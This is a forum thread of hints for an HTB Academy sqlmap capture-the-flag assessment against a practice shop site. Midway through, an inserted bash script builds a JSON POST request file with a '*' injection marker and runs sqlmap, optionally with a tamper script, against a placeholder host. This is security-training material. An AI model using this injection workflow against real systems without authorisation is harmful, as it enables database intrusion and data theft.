HTB Academy SQLMap Essentials: Skill Assessment issues

Hello, I am having quite a bit of difficulty establishing a foothold for the skills assessment, which involves a CTF of the minishop website. When I try running sqlmap on the shop or checkout pages it can’t find a parameter to exploit. However, when I run it with --forms --crawl=2 it finds forms on both of these pages but can’t inject into the parameters. Any tips for this exercise? I’ve searched around, but there hasn’t been much discussion of this course.

I finally found a parameter that should be exploitable via a POST request with JSON. Heuristic tests are saying it is injectable, but I haven’t been able to get anything to take yet. Make sure you click all the buttons on the shop and look at the network requests. sqlmap isn’t going to find it with crawl or forms.


Got the flag. My hints are as follows: 1. Locate the attack vector manually. 2. The asterisk character * is your friend. 3. -v is also your friend.


Thanks for posting something about this assessment! I’m having a hard time finding the attack vector manually. I will keep trying, but as of now I’m not sure what I’m missing within the network inspect views.

> @ecutrigut said:
> I finally found a parameter that should be exploitable via a POST request with JSON. Heuristic tests are saying it is injectable, but I haven’t been able to get anything to take yet. Make sure you click all the buttons on the shop and look at the network requests. sqlmap isn’t going to find it with crawl or forms.

Hello! I looked through all the menus but I can’t find the attack vector. The only POST request I found was the copyright link to https://colorlib.com/. Could you give some more help with this challenge?

I solved it! You need to find the PHP JSON POST script on one side, after you find the hint.

Finally I got final_flag. My suggestions are:

1. Inspect element to find the POST request. I used Burp Suite to locate the POST request and then “Inspect Element”.
2. Copy as cURL into sqlmap.
3. Use * to find the correct payloads.

> @s3e said:
> Finally I got final_flag. My suggestions are:
> 1. Inspect element to find the POST request. I used Burp Suite to locate the POST request and then “Inspect Element”.
> 2. Copy as cURL into sqlmap.
> 3. Use * to find the correct payloads.

Can somebody please tell me more about this:

> 3. Use * to find the correct payloads.


I second this. I’m stuck in the same place: I know the POST request (axxxxx.php) but I can’t get the injection to work. There are two mentions above of using “*”, but I can’t see where I would use that in a request.

Has anyone some FRESH advice on this flag?

My advice is don’t overthink it. Pay attention to what sqlmap is showing, using the hints already provided; you will notice which payload is suitable. Once you find it, use it in your sqlmap command. It is easier than you think. :)

I finally got time to come back to this one. After finding the location point for the SQL injection…

For me, some of the comments above led me in the wrong direction:

  • I did not need to use ‘-v’; all the information I needed was in the standard output (from an educational point of view, setting ‘-v 6’ is useful to see what sqlmap is actually doing).
  • I did not need to use ‘*’. There is only one variable, and so there is no place to use ‘*’.
  • I did not need to use cURL or ‘copy to cURL’. I saved the Burp request to a file.

An additional tip: the back-end server is filtering requests, but the solution is clearly stated in the sqlmap output comments; you don’t need to trawl the module for the solution.

I hope that is ACTIONABLE advice and is helpful

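The workflow the posts above converge on (capture the JSON POST from the browser’s network tab or Burp, save the raw request to a file, mark the value to test with `*`, run sqlmap from that file and read its output for the filter hint) as an added example. This is not code from the thread or from HTB; the host, path, parameter name and value are placeholders chosen for illustration, not the assessment’s real endpoint, and no tamper script is named because the thread does not name one.

```bash
#!/usr/bin/env bash
# Added example, not from the thread: build a sqlmap request file for a
# JSON POST endpoint and run sqlmap against it with an explicit '*' marker.
# TARGET_HOST, TARGET_PATH and the JSON body are assumptions (placeholders).
set -euo pipefail

TARGET_HOST="${TARGET_HOST:-127.0.0.1}"          # assumption: replace with the lab host
TARGET_PATH="${TARGET_PATH:-/api/example.php}"   # assumption: the JSON POST script you found
REQ_FILE="${REQ_FILE:-req.txt}"

# Write a raw HTTP request in the form Burp saves it ("Save item" / "Copy to
# file"), with the JSON value we want tested followed by '*'. sqlmap treats
# '*' in a -r file as an explicit injection marker: it skips parameter
# discovery and tests exactly that spot, which is why --crawl/--forms never
# reached a JS-driven JSON POST like this one.
make_request_file() {
  local body='{"id":"1*"}'   # assumption: a single JSON field
  cat > "$REQ_FILE" <<EOF
POST ${TARGET_PATH} HTTP/1.1
Host: ${TARGET_HOST}
Content-Type: application/json
Content-Length: ${#body}

${body}
EOF
}

# Count injection markers in the request file. With one JSON field there
# should be exactly one; with none, sqlmap falls back to testing every
# parameter it can parse (the "only one variable" case mentioned above).
marker_count() {
  grep -o '\*' "$REQ_FILE" | wc -l | tr -d ' '
}

# Print the sqlmap command line. --batch takes the default answer to every
# prompt; -v 3 prints the payloads actually sent and -v 6 every request,
# which is what you want when the back end is filtering and you need to see
# what gets blocked. The tamper argument is optional: use the script sqlmap
# itself suggests in its output when it detects the filter.
sqlmap_cmd() {
  local tamper="${1:-}"
  local cmd="sqlmap -r ${REQ_FILE} --batch -v 3"
  if [ -n "$tamper" ]; then
    cmd="${cmd} --tamper=${tamper}"
  fi
  printf '%s\n' "$cmd"
}

# Run sqlmap if it is installed; otherwise just show the command.
run_sqlmap() {
  local cmd
  cmd="$(sqlmap_cmd "${1:-}")"
  if ! command -v sqlmap >/dev/null 2>&1; then
    echo "sqlmap not installed; would run: ${cmd}" >&2
    return 0
  fi
  eval "$cmd"
}

make_request_file
echo "wrote ${REQ_FILE} with $(marker_count) injection marker(s)"
sqlmap_cmd
```

Run it once without a tamper argument, read the note sqlmap prints when its heuristics detect a WAF or filter, then call `run_sqlmap <tamper-script>` with the script it names. If you add `--dump` later, keep `-r` and the marker file unchanged so sqlmap reuses its session for the same injection point.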

How did you find it? I am hard stuck; I can’t see anything when I try using Burp and the network tab.

Where did you find it, and how? I’ve tried to find it but haven’t seen anything.

I am also stuck. I can find 4 tables with sqlmap (I found a tamper that is needed here) but nothing more. I can’t dump schemas or contents, no file write, tried proxies and still stuck. Does anyone have a nudge?